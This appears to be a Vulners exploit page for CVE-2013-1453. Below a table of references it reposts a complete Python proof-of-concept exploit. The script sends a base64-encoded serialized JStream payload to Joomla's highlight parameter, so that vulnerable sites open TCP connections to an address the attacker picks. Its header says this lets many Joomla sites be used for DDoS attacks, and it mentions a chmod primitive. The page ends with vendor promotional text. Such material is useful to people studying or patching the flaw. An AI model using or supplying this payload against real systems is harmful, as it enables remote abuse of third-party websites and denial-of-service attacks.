| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2013-1453 | 27 Feb 201300:00 | – | circl | |
| CVE-2013-1453 | 13 Feb 201301:00 | – | cve | |
| CVE-2013-1453 | 13 Feb 201301:00 | – | cvelist | |
| Joomla! 3.0.2 - 'highlight.php' PHP Object Injection | 27 Feb 201300:00 | – | exploitdb | |
| EUVD-2013-1489 | 7 Oct 202500:30 | – | euvd | |
| Joomla! 3.0.2 - highlight.php PHP Object Injection | 27 Feb 201300:00 | – | exploitpack | |
| [20130201] - Core - Information Disclosure | 31 Oct 201200:00 | – | joomla | |
| Joomla! 2.5.x < 2.5.9 / 3.0.x < 3.0.3 Multiple Vulnerabilities | 14 Feb 201300:00 | – | nessus | |
| CVE-2013-1453 | 13 Feb 201301:55 | – | nvd | |
| Joomla! 'highlight' Parameter PHP Object Injection Vulnerability | 3 Mar 201300:00 | – | openvas |
#!/usr/bin/python
#
# Joomla <=2.5.8, <=3.0.2 remote tcp connections opener
#
# Vendor homepage: www.joomla.org ,'
# Versions affected: <=2.5.8, <=3.0.2 ,'
# Created: 2012-12-08 .,. ,'
# Public disclosure: 2013-02-04 .`.`.`. ,' ,'
# CVE: CVE-2013-1453 .`.`.`.`. ,' ,'
# .`.`.`.`.
# Joomla core plugin 'highlight' unserializes .`.`.`.`. ,' ,'
# not trusted input. Plugin is enabled by \\`.`.`. ,'
# default in standard joomla installation. /\.,. ,' ,'
# /
# This proof of concept exploit uses JStream :
# joomla class to make target opens remote tcp :
# connections to custom address, therefore /
# multiple vulnerable joomla instances can be "
# used for ddos attacks.
#
# (JStream class can also be used to execute chmod on any file with any mode)
#
# Author: Marcin "redeemer" Probola
#
import threading
import datetime
import base64
import httplib
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-H","--host",dest="host", help="Host with vulnerable joomla instance", default="localhost")
parser.add_option("-C","--connect",dest="connectHost", help="Make connection to (in format HOST:PORT)", default="localhost:80")
parser.add_option("-T","--threads",dest="threads", help="number of threads", default=1)
(options, args) = parser.parse_args()
# vars
host = options.host
connectHost = options.connectHost
threads = int(options.threads)
# prepare serialized content
serializedTemplate = 'O:7:"JStream":14:{s:11:"\0*\0filemode";i:438;s:10:"\0*\0dirmode";i:493;s:12:"\0*\0chunksize";i:8192;s:11:"\0*\0filename";s:%d:"%s";s:14:"\0*\0writeprefix";s:0:"";s:13:"\0*\0readprefix";s:0:"";s:19:"\0*\0processingmethod";s:1:"f";s:10:"\0*\0filters";a:0:{}s:6:"\0*\0_fh";s:1:"1";s:12:"\0*\0_filesize";N;s:11:"\0*\0_context";N;s:18:"\0*\0_contextOptions";a:0:{}s:12:"\0*\0_openmode";s:1:"w";s:10:"\0*\0_errors";a:0:{}}'
ftpConnectUrl = "ftp://u:[email protected]" + connectHost + "/s"
serializedBase64 = base64.b64encode( serializedTemplate % ( ftpConnectUrl.__len__(), ftpConnectUrl) )
# thread class - blow (make http request)
class ThreadClass(threading.Thread):
def run(self):
conn = httplib.HTTPConnection(host)
conn.connect()
conn.request("GET", "/?highlight="+serializedBase64)
print host + " connect(" +str(threads)+") to " + connectHost + "\n"
# run threads
for i in range(threads):
t = ThreadClass()
t.start()
# 0day.today [2018-01-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation